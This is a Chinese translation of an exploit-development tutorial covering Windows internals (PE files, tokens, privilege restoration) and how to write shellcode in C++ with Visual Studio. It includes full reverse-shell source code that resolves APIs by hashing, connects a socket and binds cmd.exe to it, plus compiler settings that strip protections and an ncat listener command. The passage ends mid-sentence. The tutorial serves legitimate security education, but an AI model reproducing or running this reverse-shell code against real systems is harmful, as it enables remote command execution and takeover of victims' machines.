Exploit开发系列教程Windows基础&shellcode

  • A+
所属分类:安全文章
摘要

from:http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/这篇文章简要讲述Windows开发者应该了解的一些常识。

from:http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/

Windows基础


0x00 Windows Basics

这篇文章简要讲述Windows开发者应该了解的一些常识。

0x01 Win32 API

Windows的主要API由多个DLLs(Dynamic Link Libraries)提供。某个应用可以从那些DLL中导入函数并且对它们进行调用。这样就保证了普通用户态应用程序的可移植性。

0x02 PE文件格式

执行体和DLL都是PE(Portable Executable)文件。每个PE含有一个导入和导出表。导入表指定导入函数以及这些函数所在的文件(模块)。导出表指定导出函数,等等。函数可以被导入到其它的PE文件。

PE文件由多个节(section)组成(代码节,数据节,等等…)。在内存中, .reloc节中具有重定位可执行体或DLL的信息。在内存中,虽然有些代码(例如相对的jmp指令)的地址是相对的,但是多数代码所在的地址是绝对的,这取决于被加载的模块。

Windows loader从当前工作目录开始搜索DLLs,发布的某个应用可能具有一个不同于系统根(/windows/system32)目录中的DLL。该版本方面的问题(不兼容)被一些人称作DLL-hell

重要的是理解相对虚拟内存地址 (Relative Virtual Address,RVA)的概念。PE文件提供RVAs来指定模块的相对基地址。换句话说,在内存中,如果某个模块在地址B(基地址)上被加载并且某个元素在该模块中具有RVA为X这一偏移量,那么该元素的虚拟内存地址(Virtual Address,VA)偏移量为B+X

0x03 线程

如果你过去经常使用Windows平台,那么应该非常了解线程的概念。但是,如果你经常使用的是Linux,那么请记住,Windows平台将会为线程提供CPU时间片。你可以用CreateProcess()创建新进程并且用CreateThreads()创建新线程。线程会在它们所在进程的地址空间内执行,因此它们所在的内存是共享的。

线程也会被一种称作TLS(Thread Local Storage)的机制限制,该机制为线程提供了非共享内存。

基本上,每个线程的TEB都含有一个TLS数组,它具有64个DWORD值,并且在运行过程中超出TLS数组的有效元素个数时,会为额外的TLS数组分配1024个DWORD值。首先,两个数组中的一个数组的每个元素会对应一个索引值,该索引值必须被分配或使用TlsAlloc()来得到,可以用TlsGetValue(index) 来读取DWORD值并用TlsSetValue(index, newValue)将其写入。如,在当前线程的TEB中,TlsGetValue(7)表示从TLS数组中索引值为7的地址上读取DWORD值。

笔记:我们可以通过使用GetCurrentThreadId()来模拟该机制,但是不会有一样的效果。

0x04 令牌

令牌通常用于描述访问权限。就像文件句柄那样,令牌仅仅是一个32位整数。每个进程具有一个内部结构,该结构含有关于访问权限的信息,它与令牌相关联。

令牌分为两种类型:主令牌和模仿令牌。无论何时,某个进程被创建后都会被分配一个主令牌。进程的每个线程都可以拥有进程的令牌,或从另一进程中获取模仿令牌。如果LogonUser()函数被调用,则会返回一个不能被使用于CreateProcessAsUser()的模仿令牌(提供凭据),除非你调用了DupcateTokenEx来将其转换为主令牌。

可以使用SetThreadToken(newToken) 将某个令牌附加到当前线程并且可以使用RevertToSelf()来将该令牌删除,从而让线程的令牌还原为主令牌。

我们来了解下在Windows平台上,将某个用户连接到服务器并发送用户名和密码的情况。首先以SYSTEM身份运行服务器,将会调用具有凭据的LogonUser(),如果成功则返回新令牌。接着会在服务器创建新线程的同时调用SetThreadToken(new_token),new_token参数是一个由 LogonUser()返回的令牌值。这样,线程被执行时就具有与用户一样的权限。当线程完成了对客户端的服务时,或者会被销毁,或者将调用revertToSelf() 而被添加到线程池的空闲线程队列中。

如果可以控制服务器,那么可通过调用RevertToSelf(),或在内存中查找其它的令牌并使用SetThreadToken()函数将它们附加到当前线程,从而恢复当前线程的权限,即SYSTEM权限。

值得注意的是,CreateProcess()使用主令牌作为新进程的令牌。当具有比主令牌更高权限的模仿令牌的线程调用CreateProcess()时存在一个问题,那就是新进程的权限会低于创建该进程的线程。

解决方案是使用DuplicateTokenEx()从当前线程的模拟令牌中创建一个新的主令牌,接着通过调用具有新的主令牌的CreateProcessAsUser() 创建新进程。

shellcode


0x00 介绍

Shellcode是一段被exploit作为payload发送的代码,它被注入到存在漏洞的应用,并且会被执行。Shellcode是自包含的,并且应该不含有null字节。通常使用函数如strcpy()来复制shellcode,在进行该复制过程中遇到null字节时,将停止复制。这样做会导致shellcode不能被完全复制。Shellcode一般直接由汇编语言编写,但是,在这篇文章中,我们将通过Visual Studio 2013使用c/c++来开发shellcode。在该开发环境下进行开发的好处如下:

1.花费更短的开发时间。

2.智能提示(intellisense)。

3.易于调试。

我们将使用VS2013来生成一个具有shellcode的执行体,也将使用python脚本来提取并修复(移除null字节)shellcode

0x01 C/C++ 代码

仅仅使用栈变量

为了编写浮动地址代码(position independent code),我们必须使用栈变量。这意味着我们不能这么写。

char *v = new char[100]; 

因为那数组将被分配到栈。根据绝对地址,试着从msvcr120.dll 中调用new函数:

00191000 6A 64                push        64h 00191002 FF 15 90 20 19 00    call        dword ptr ds:[192090h] 

地址192090h上包含函数的地址。在没有依赖导入表以及Windows loader的情况下,要调用某库中已导入的函数,我们必须直接这么做。 另一个存在的问题是,新操作符可能需要某种通过c/c++语言编写的运行时组件来完成的初始化操作。

不能使用全局变量:

int x;   int main() {   x = 12; } 

上面的代码 (如果没有被优化)生成如下:

008E1C7E C7 05 30 91 8E 00 0C 00 00 00 mov         dword ptr ds:[8E9130h],0Ch 

地址8E9130h为变量x的绝对地址。

如果我们编写如下,会导致字符串存在问题

char str[] = "I'm a string";  printf(str); 

字符串将被放入执行体的.rdata节中,并且会对其进行绝对地址引用。

shellcode中不得使用printf:这只是一个了解str如何被引用的范例。

这是asm代码:

00A71006 8D 45 F0             lea         eax,[str] 00A71009 56                   push        esi 00A7100A 57                   push        edi 00A7100B BE 00 21 A7 00       mov         esi,0A72100h 00A71010 8D 7D F0             lea         edi,[str] 00A71013 50                   push        eax 00A71014 A5                   movs        dword ptr es:[edi],dword ptr [esi] 00A71015 A5                   movs        dword ptr es:[edi],dword ptr [esi] 00A71016 A5                   movs        dword ptr es:[edi],dword ptr [esi] 00A71017 A4                   movs        byte ptr es:[edi],byte ptr [esi] 00A71018 FF 15 90 20 A7 00    call        dword ptr ds:[0A72090h] 

正如你所看到的,字符串位于.rdata节中,地址为A72100h,通过movsdmovsb指令的执行,它会被复制进栈(str指向栈)。注意:A72100h为绝对地址。显然该代码不是地址无关的。

如果我们这样写:

char *str = "I'm a string"; printf(str); 

那么字符串仍然会被放入.data节,但不会被复制进栈:

00A31000 68 00 21 A3 00       push        0A32100h 00A31005 FF 15 90 20 A3 00    call        dword ptr ds:[0A32090h] 

字符串在.rdata节中,绝对地址为A32100h

如何让该代码地址无关?

更简单的(部分)解决方案:

char str[] = { 'I', '/'', 'm', ' ', 'a', ' ', 's', 't', 'r', 'i', 'n', 'g', '/0' }; printf(str); 

对应的汇编代码如下:

012E1006 8D 45 F0             lea         eax,[str] 012E1009 C7 45 F0 49 27 6D 20 mov         dword ptr [str],206D2749h 012E1010 50                   push        eax 012E1011 C7 45 F4 61 20 73 74 mov         dword ptr [ebp-0Ch],74732061h 012E1018 C7 45 F8 72 69 6E 67 mov         dword ptr [ebp-8],676E6972h 012E101F C6 45 FC 00          mov         byte ptr [ebp-4],0 012E1023 FF 15 90 20 2E 01    call        dword ptr ds:[12E2090h] 

除了对printf的调用外,该段代码是地址无关的,因为字符串部分被直接编码进了mov指令的源操作数中。一旦该字符串在栈上,则可以被使用。

不幸的是,当字符串达到一定长度时,该方法就失效了。代码为:

char str[] = { 'I', '/'', 'm', ' ', 'a', ' ', 'v', 'e', 'r', 'y', ' ', 'l', 'o', 'n', 'g', ' ', 's', 't', 'r', 'i', 'n', 'g', '/0' }; printf(str); 

生成

013E1006 66 0F 6F 05 00 21 3E 01 movdqa      xmm0,xmmword ptr ds:[13E2100h] 013E100E 8D 45 E8             lea         eax,[str] 013E1011 50                   push        eax 013E1012 F3 0F 7F 45 E8       movdqu      xmmword ptr [str],xmm0 013E1017 C7 45 F8 73 74 72 69 mov         dword ptr [ebp-8],69727473h 013E101E 66 C7 45 FC 6E 67    mov         word ptr [ebp-4],676Eh 013E1024 C6 45 FE 00          mov         byte ptr [ebp-2],0 013E1028 FF 15 90 20 3E 01    call        dword ptr ds:[13E2090h] 

正如你所看到的,当字符串的其它部分像之前那样被编码进mov指令的源操作数中时,字符串部分将被定位在.rdata节中,地址为13E2100h。

我已提出的解决方案如下:

char *str = "I'm a very long string"; 

同时使用Python脚本修复shellcode。该脚本需要从.rdata节中提取被引用的字符串,并将它们放入到shellcode中,然后修复重定位信息。我们马上会了解到该实现方法。

不直接调用Windows API

C/C++代码中,我们不能编写

WaitForSingleObject(procInfo.hProcess, INFINITE); 

因为kernel32.dll中已导入了“WaitForSingleObject”函数。

nutshell中,PE文件含有导入表和导入地址表(IAT)。导入表含有被导入到库中的函数的信息。当执行体被加载时,通过Windows loader编译IAT,并且其含有已导入的函数地址。该执行体的代码用间接寻址调用已导入到库中的函数。例如:

 001D100B FF 15 94 20 1D 00    call        dword ptr ds:[1D2094h] 

地址1D2094h为入口地址(在IAT中),该地址含有函数 MessageBoxA的地址。因为如上调用函数的地址无需被修复(除非执行体被重定位),所以可以直接使用该地址。Windows loader只需要修复的是在1D2094h地址,该dword值是MessageBoxA函数的地址。

解决方案是直接从Windows的数据结构中得到Windows的函数地址。之后我们将会了解到。

创建新项目

通过 File→New→Project…, 选择 Installed→Templates→Visual C++→Win32→Win32 Console Application, 为项目命名 (我将其命名为 shellcode) 接着点击OK。

通过 Project→<project name> properties 将出现新会话框。通过将 Configuration(会话的左上方)设置为All Configurations将修改应用到所有配置(ReleaseDebug)。接着,展开Configuration Properties并且在General 下修改Platform Toolset 。该编译器为Visual C++ Compiler Nov 2013 CTP(CTP_Nov2013)。

这样你将可以使用C++11C++14的一些特性,如static_assert

Shellcode范例

这是一段简单的反向shell代码(定义)。将命名为shellcode.cpp的文件添加到项目中并将该代码复制到shellcode.cpp。不要试图理解所有的代码。后面我们还会对其进行进一步的讨论。

// Simple reverse shell shellcode by Massimiliano Tomassoli (2015) // NOTE: Compiled on Visual Studio 2013 + "Visual C++ Compiler November 2013 CTP".   #include <WinSock2.h>               // must preceed #include <windows.h> #include <WS2tcpip.h> #include <windows.h> #include <winnt.h> #include <winternl.h> #include <stddef.h> #include <stdio.h>   #define htons(A) ((((WORD)(A) & 0xff00) >> 8) | (((WORD)(A) & 0x00ff) << 8))   _inline PEB *getPEB() {     PEB *p;     __asm {         mov     eax, fs:[30h]         mov     p, eax     }     return p; }   DWORD getHash(const char *str) {     DWORD h = 0;     while (*str) {         h = (h >> 13) | (h << (32 - 13));       // ROR h, 13         h += *str >= 'a' ? *str - 32 : *str;    // convert the character to uppercase         str++;     }     return h; }   DWORD getFunctionHash(const char *moduleName, const char *functionName) {     return getHash(moduleName) + getHash(functionName); }   LDR_DATA_TABLE_ENTRY *getDataTableEntry(const LIST_ENTRY *ptr) {     int list_entry_offset = offsetof(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);     return (LDR_DATA_TABLE_ENTRY *)((BYTE *)ptr - list_entry_offset); }   // NOTE: This function doesn't work with forwarders. For instance, kernel32.ExitThread forwards to //       ntdll.RtlExitUserThread. The solution is to follow the forwards manually. PVOID getProcAddrByHash(DWORD hash) {     PEB *peb = getPEB();     LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;     LIST_ENTRY *ptr = first;     do {                            // for each module         LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);         ptr = ptr->Flink;           BYTE *baseAddress = (BYTE *)dte->DllBase;         if (!baseAddress)           // invalid module(???)             continue;         IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;         IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);         DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;         if (!iedRVA)                // Export Directory not present             continue;         IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);         char *moduleName = (char *)(baseAddress + ied->Name);         DWORD moduleHash = getHash(moduleName);           // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th         // element of both arrays refer to the same function. The first array specifies the name whereas         // the second the ordinal. This ordinal can then be used as an index in the array pointed to by         // AddressOfFunctions to find the entry point of the function.         DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);         for (DWORD i = 0; i < ied->NumberOfNames; ++i) {             char *functionName = (char *)(baseAddress + nameRVAs[i]);             if (hash == moduleHash + getHash(functionName)) {                 WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];                 DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];                 return baseAddress + functionRVA;             }         }     } while (ptr != first);       return NULL;            // address not found }   #define HASH_LoadLibraryA           0xf8b7108d #define HASH_WSAStartup             0x2ddcd540 #define HASH_WSACleanup             0x0b9d13bc #define HASH_WSASocketA             0x9fd4f16f #define HASH_WSAConnect             0xa50da182 #define HASH_CreateProcessA         0x231cbe70 #define HASH_inet_ntoa              0x1b73fed1 #define HASH_inet_addr              0x011bfae2 #define HASH_getaddrinfo            0xdc2953c9 #define HASH_getnameinfo            0x5c1c856e #define HASH_ExitThread             0x4b3153e0 #define HASH_WaitForSingleObject    0xca8e9498   #define DefineFuncPtr(name)     decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)   int entryPoint() { //  printf("0x%08x/n", getFunctionHash("kernel32.dll", "WaitForSingleObject")); //  return 0;       // NOTE: we should call WSACleanup() and freeaddrinfo() (after getaddrinfo()), but     //       they're not strictly needed.       DefineFuncPtr(LoadLibraryA);       My_LoadLibraryA("ws2_32.dll");       DefineFuncPtr(WSAStartup);     DefineFuncPtr(WSASocketA);     DefineFuncPtr(WSAConnect);     DefineFuncPtr(CreateProcessA);     DefineFuncPtr(inet_ntoa);     DefineFuncPtr(inet_addr);     DefineFuncPtr(getaddrinfo);     DefineFuncPtr(getnameinfo);     DefineFuncPtr(ExitThread);     DefineFuncPtr(WaitForSingleObject);       const char *hostName = "127.0.0.1";     const int hostPort = 123;       WSADATA wsaData;       if (My_WSAStartup(MAKEWORD(2, 2), &wsaData))         goto __end;         // error     SOCKET sock = My_WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);     if (sock == INVALID_SOCKET)         goto __end;       addrinfo *result;     if (My_getaddrinfo(hostName, NULL, NULL, &result))         goto __end;     char ip_addr[16];     My_getnameinfo(result->ai_addr, result->ai_addrlen, ip_addr, sizeof(ip_addr), NULL, 0, NI_NUMERICHOST);       SOCKADDR_IN remoteAddr;     remoteAddr.sin_family = AF_INET;     remoteAddr.sin_port = htons(hostPort);     remoteAddr.sin_addr.s_addr = My_inet_addr(ip_addr);       if (My_WSAConnect(sock, (SOCKADDR *)&remoteAddr, sizeof(remoteAddr), NULL, NULL, NULL, NULL))         goto __end;       STARTUPINFOA sInfo;     PROCESS_INFORMATION procInfo;     SecureZeroMemory(&sInfo, sizeof(sInfo));        // avoids a call to _memset     sInfo.cb = sizeof(sInfo);     sInfo.dwFlags = STARTF_USESTDHANDLES;     sInfo.hStdInput = sInfo.hStdOutput = sInfo.hStdError = (HANDLE)sock;     My_CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);       // Waits for the process to finish.     My_WaitForSingleObject(procInfo.hProcess, INFINITE);   __end:     My_ExitThread(0);       return 0; }   int main() {     return entryPoint(); } 

编译器配置

通过Project→<project name> properties, 展开 Configuration Properties接着选择 C/C++。应用修改后的Release配置。

这里是需要修改的设置:

  • General:
    • oSDL Checks: No (/sdl-)

这可能并不需要,但是我已将它们关闭了。

  • Optimization:
    • Optimization: Minimize Size (/O1)

这很重要!我们得尽可能将shellcode简短。

* Inline Function Expansion: Only __inline (/Ob1) 

使用这个设置告诉VS 2013只用_inline来定义内联函数。main() 仅调用shellcode的函数entryPoint。如果函数 entryPoint是简短的,那么它可能会被内联进main()。这将是极糟的,因为main()将不再透露shellcode的后一部分(事实上它包含了该部分)。后面会了解到原因。

* Enable Intrinsic Functions: Yes (/Oi) 

我不知道该设置是否应该关闭。

* Favor Size Or Speed: Favor small code (/Os)  * Whole Program Optimization: Yes (/GL) 
  • Code Generation:
    • Security Check: Disable Security Check (/GS-)

不需要安全检查!

* Enable Function-Level linking: Yes (/Gy) 

linker配置

通过Project→<project name> properties, 展开Configuration Properties接着查看Linker。应用修改后的Release配置。这里是你需要修改的相关设置:

  • General:
    • Enable Incremental Linking: No (/INCREMENTAL:NO)
  • Debugging:
    • Generate Map File: Yes (/MAP)

告诉linker生成含有EXE结构的映射文件。

* Map File Name: mapfile 

这是映射文件名。可自定义文件名。

  • Optimization:
    • References: Yes (/OPT:REF)

该选项对于生成简短的shellcode来说非常重要,因为可以除去函数以及不被代码引用的数据。

* Enable COMDAT Folding: Yes (/OPT:ICF)  * Function Order: function_order.txt 

应用该设置读取命名为function_order.txt 的文件,该文件指定必须出现在代码节中函数的顺序。我们要将函数 entryPoint变为代码节中的第一个函数,可想而知,function_order.txt中必存在一行代码含有字符串[email protected]@YAHXZ。可以在映射文件中找到该函数名。

getProcAddrByHash

该函数返回由某个出现在内存中的模块(.exe.dll)导出的某个函hash数的地址,已给出的`值与模块和函数相关联。当然,通过名字查找函数具有一定的可能性,但是这样做需要考虑空间方面的问题,因为那些名字应该被包含在shellcode中。在另一方面,一个hash仅有4个字节。因为我们不使用两个hash(一个用于模块,一个用于函数),getProcAddrByHash`需要考虑所有被加载进内存中的模块。

通过user32.dll导出函数MessageBoxA,该函数的hash值可通过如下方法计算:

DWORD hash = getFunctionHash("user32.dll", "MessageBoxA"); 

计算出的hash值为getHash(“user32.dll”) 与getHash(“MessageBoxA”)的hash值的总和。函数getHash的实现简明易懂:

DWORD getHash(const char *str) {     DWORD h = 0;     while (*str) {         h = (h >> 13) | (h << (32 - 13));       // ROR h, 13         h += *str >= 'a' ? *str - 32 : *str;    // convert the character to uppercase         str++;     }     return h; } 

正如你可以了解到的,hash值是大小写不敏感的(不区分大小写),重要的是,因为在内存中,某种Windows的版本所使用的字符串都为大写。 首先,getProcAddrByHash获取TEB(Thread Environment Block)的地址:

PEB *peb = getPEB();  where  _inline PEB *getPEB() {     PEB *p;     __asm {         mov     eax, fs:[30h]         mov     p, eax     }     return p; } 

选择子fs与某个始于TEB地址的段相关联。在偏移30h上,TEB含有一个PEB(Process Environment Block)指针。用WinDbg可以观察到:

0:000> dt _TEB @$teb ntdll!_TEB +0x000 NtTib            : _NT_TIB +0x01c EnvironmentPointer : (null) +0x020 ClientId         : _CLIENT_ID +0x028 ActiveRpcHandle  : (null) +0x02c ThreadLocalStoragePointer : 0x7efdd02c Void +0x030 ProcessEnvironmentBlock : 0x7efde000 _PEB +0x034 LastErrorValue   : 0 +0x038 CountOfOwnedCriticalSections : 0 +0x03c CsrClientThread  : (null) <snip> 

PEB与当前的进程相关联,除了别的以外,含有关于某些模块的信息,这些模块都被加载到进程地址空间中。 此处又是getProcAddrByHash

PVOID getProcAddrByHash(DWORD hash) {     PEB *peb = getPEB();     LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;     LIST_ENTRY *ptr = first;     do {                            // for each module         LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);         ptr = ptr->Flink;         .         .         .     } while (ptr != first);       return NULL;            // address not found } 

此处为PEB部分:

0:000> dt _PEB @$peb ntdll!_PEB    +0x000 InheritedAddressSpace : 0 ''    +0x001 ReadImageFileExecOptions : 0 ''    +0x002 BeingDebugged    : 0x1 ''    +0x003 BitField         : 0x8 ''    +0x003 ImageUsesLargePages : 0y0    +0x003 IsProtectedProcess : 0y0    +0x003 IsLegacyProcess  : 0y0    +0x003 IsImageDynamicallyRelocated : 0y1    +0x003 SkipPatchingUser32Forwarders : 0y0    +0x003 SpareBits        : 0y000    +0x004 Mutant           : 0xffffffff Void    +0x008 ImageBaseAddress : 0x00060000 Void    +0x00c Ldr              : 0x76fd0200 _PEB_LDR_DATA    +0x010 ProcessParameters : 0x00681718 _RTL_USER_PROCESS_PARAMETERS    +0x014 SubSystemData    : (null)    +0x018 ProcessHeap      : 0x00680000 Void    <snip> 

在偏移0Ch上,是一个被称作Ldr的字段,它是个PEB_LDR_DATA 结构指针。使用WinDbg进行观察:

0:000> dt _PEB_LDR_DATA 0x76fd0200 ntdll!_PEB_LDR_DATA    +0x000 Length           : 0x30    +0x004 Initialized      : 0x1 ''    +0x008 SsHandle         : (null)    +0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 - 0x6862c0 ]    +0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x683088 - 0x6862c8 ]    +0x01c InInitializationOrderModuleList : _LIST_ENTRY [ 0x683120 - 0x6862d0 ]    +0x024 EntryInProgress  : (null)    +0x028 ShutdownInProgress : 0 ''    +0x02c ShutdownThreadId : (null) 

InMemoryOrderModuleList是一个LDR_DATA_TABLE_ENTRY结构的双链表,它与当前进程的地址空间中所加载的模块相关联。更确切地说,InMemoryOrderModuleList 是一个LIST_ENTRY,它含有两个部分:

0:000> dt _LIST_ENTRY ntdll!_LIST_ENTRY +0x000 Flink            : Ptr32 _LIST_ENTRY +0x004 Blink            : Ptr32 _LIST_ENTRY 

Flink为前向链表,Blink为后向链表。Flink指向第一个模块的LDR_DATA_TABLE_ENTRY 。当然,未必就是如此:

Flink指向一个被包含在结构LDR_DATA_TABLE_ENTRY中的LIST_ENTRY结构。

我们来观察LDR_DATA_TABLE_ENTRY 是如何被定义的:

0:000> dt _LDR_DATA_TABLE_ENTRY ntdll!_LDR_DATA_TABLE_ENTRY +0x000 InLoadOrderLinks : _LIST_ENTRY +0x008 InMemoryOrderLinks : _LIST_ENTRY +0x010 InInitializationOrderLinks : _LIST_ENTRY +0x018 DllBase          : Ptr32 Void +0x01c EntryPoint       : Ptr32 Void +0x020 SizeOfImage      : Uint4B +0x024 FullDllName      : _UNICODE_STRING +0x02c BaseDllName      : _UNICODE_STRING +0x034 Flags            : Uint4B +0x038 LoadCount        : Uint2B +0x03a TlsIndex         : Uint2B +0x03c HashLinks        : _LIST_ENTRY +0x03c SectionPointer   : Ptr32 Void +0x040 CheckSum         : Uint4B +0x044 TimeDateStamp    : Uint4B +0x044 LoadedImports    : Ptr32 Void +0x048 EntryPointActivationContext : Ptr32 _ACTIVATION_CONTEXT +0x04c PatchInformation : Ptr32 Void +0x050 ForwarderLinks   : _LIST_ENTRY +0x058 ServiceTagLinks  : _LIST_ENTRY +0x060 StaticLinks      : _LIST_ENTRY +0x068 ContextInformation : Ptr32 Void +0x06c OriginalBase     : Uint4B +0x070 LoadTime         : _LARGE_INTEGER 

InMemoryOrderModuleList.Flink指向位于偏移为8的_LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks,因此,我们必须减去8来获取 _LDR_DATA_TABLE_ENTRY的地址。

首先,获取Flink指针:

+0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x683080 - 0x6862c0 ] 

它的值是0x683080,因此_LDR_DATA_TABLE_ENTRY 结构的地址为0x683080 – 8 = 0x683078:

0:000> dt _LDR_DATA_TABLE_ENTRY 683078 ntdll!_LDR_DATA_TABLE_ENTRY    +0x000 InLoadOrderLinks : _LIST_ENTRY [ 0x359469e5 - 0x1800eeb1 ]    +0x008 InMemoryOrderLinks : _LIST_ENTRY [ 0x683110 - 0x76fd020c ]    +0x010 InInitializationOrderLinks : _LIST_ENTRY [ 0x683118 - 0x76fd0214 ]    +0x018 DllBase          : (null)    +0x01c EntryPoint       : (null)    +0x020 SizeOfImage      : 0x60000    +0x024 FullDllName      : _UNICODE_STRING "蒮m쿟ᄍ엘ᆲ膪n???"    +0x02c BaseDllName      : _UNICODE_STRING "C:/Windows/SysWOW64/calc.exe"    +0x034 Flags            : 0x120010    +0x038 LoadCount        : 0x2034    +0x03a TlsIndex         : 0x68    +0x03c HashLinks        : _LIST_ENTRY [ 0x4000 - 0xffff ]    +0x03c SectionPointer   : 0x00004000 Void    +0x040 CheckSum         : 0xffff    +0x044 TimeDateStamp    : 0x6841b4    +0x044 LoadedImports    : 0x006841b4 Void    +0x048 EntryPointActivationContext : 0x76fd4908 _ACTIVATION_CONTEXT    +0x04c PatchInformation : 0x4ce7979d Void    +0x050 ForwarderLinks   : _LIST_ENTRY [ 0x0 - 0x0 ]    +0x058 ServiceTagLinks  : _LIST_ENTRY [ 0x6830d0 - 0x6830d0 ]    +0x060 StaticLinks      : _LIST_ENTRY [ 0x6830d8 - 0x6830d8 ]    +0x068 ContextInformation : 0x00686418 Void    +0x06c OriginalBase     : 0x6851a8    +0x070 LoadTime         : _LARGE_INTEGER 0x76f0c9d0 

正如你可以看到的,我正在用WinDbg调试calc.exe!不错:第一个模块是执行体本身。重要的是DLLBase (c)字段。根据给出的模块的基地址,我们可以分析被加载到内存中的PE文件并获取所有信息,如已导出的函数地址。 在getProcAddrByHash中我们所做的:

BYTE *baseAddress = (BYTE *)dte->DllBase;     if (!baseAddress)           // invalid module(???)         continue;     IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;     IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);     DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;     if (!iedRVA)                // Export Directory not present         continue;     IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);     char *moduleName = (char *)(baseAddress + ied->Name);     DWORD moduleHash = getHash(moduleName);       // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th     // element of both arrays refer to the same function. The first array specifies the name whereas     // the second the ordinal. This ordinal can then be used as an index in the array pointed to by     // AddressOfFunctions to find the entry point of the function.     DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);     for (DWORD i = 0; i < ied->NumberOfNames; ++i) {         char *functionName = (char *)(baseAddress + nameRVAs[i]);         if (hash == moduleHash + getHash(functionName)) {             WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];             DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];             return baseAddress + functionRVA;         }     }     .     .     . 

了解PE文件格式的规范可以更好地理解该段代码,这里不详细讲解。在PE文件结构中需要注意的是RVA(Relative Virtual Addresses)。即相对于PE模块(Dllbase)中基地址的地址。例如,如果RVA100h并且DllBase400000h,那么指向数据的RVA400000h + 100h = 400100h。 该模块始于DOS_HEADER 。它包含一个NT_HEADERSRVA(e_lfanew)。FILE_HEADEROPTIONAL_HEADERNT_HEADERS存在于NT_HEADERSOPTIONAL_HEADER含有一个被称作DataDirectory的数组,该数组指向PE模块的多个目录。了解Export Directory可参考链接https://msdn.microsoft.com/en-us/library/ms809762.aspx中提到的相关细节。

如下C结构体与Export Directory相关联,其定义如下:

typedef struct _IMAGE_EXPORT_DIRECTORY {     DWORD   Characteristics;     DWORD   TimeDateStamp;     WORD    MajorVersion;     WORD    MinorVersion;     DWORD   Name;     DWORD   Base;     DWORD   NumberOfFunctions;     DWORD   NumberOfNames;     DWORD   AddressOfFunctions;     // RVA from base of image     DWORD   AddressOfNames;         // RVA from base of image     DWORD   AddressOfNameOrdinals;  // RVA from base of image } IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY; 

DefineFuncPtr

DefineFuncPtr 是一个宏,它有助于定义一个已导入的函数指针. 这是范例:

#define HASH_WSAStartup           0x2ddcd540   #define DefineFuncPtr(name)       decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)   DefineFuncPtr(WSAStartup); 

WSAStartup函数是ws2_32.dll中已导入的函数,因此通过该方法计算HASH_WSAStartup

DWORD hash = getFunctionHash("ws2_32.dll", "WSAStartup"); 

当宏被展开时,

DefineFuncPtr(WSAStartup); 

变为

decltype(WSAStartup) *My_WSAStartup = (decltype(WSAStartup) *)getProcAddrByHash(HASH_WSAStartup) 

decltype(WSAStartup)为 WSAStartup函数的类型。这样,我们无需重定义函数原型。注意:在C++11中有关于 decltype的描述。

现在我们可通过My_WSAStartup调用 WSAStartup

注意:从模块中导入函数之前,我们需要确保已经在内存中加载了这个模块。

最简单的方法是使用LoadLibrary加载模块。

DefineFuncPtr(LoadLibraryA);   My_LoadLibraryA("ws2_32.dll"); 

该操作有效,因为kernel32.dll中已导入了LoadLibrary,正如我们说过的,它总会出现在内存中。

我们也可以导入GetProcAddress并使用它来获取所有其它我们需要的函数地址,但是没必要这么做,因为我们需要将所有的函数名包含在shellcode中。

entryPoint

显然,entryPointshellcode和实现反向shell的入口点。首先,我们导入所有我们需要的函数,接着我们使用它们。细节不重要并且我不得不说winsock API的使用非常麻烦。

nutshell中:

1.创建套接字, 2.将套接字连接到127.0.0.1:123, 3.创建一个执行cmd.exe的进程, 4.将套接字附加到进程的标准输入,标准输出以及标准错误输出, 5.等待进程被终止, 6.当进程已经终止时,则终止当前线程。

第3点与第4点同时进行,第4点调用了CreateProcess, 攻击者可以连接到端口123上进行监听,一旦被成功连接,就可以通过套接字(socket),即TCP连接,与运行在远程机器中的cmd.exe进行交互。

安装ncat,运行cmd并在命令行上输入:

ncat -lvp 123 

此时将会在端口123上监听.

接着回到Visual Studio 2013,选择Release,搭建项目并运行它。再回到ncat,你将观察到如下:

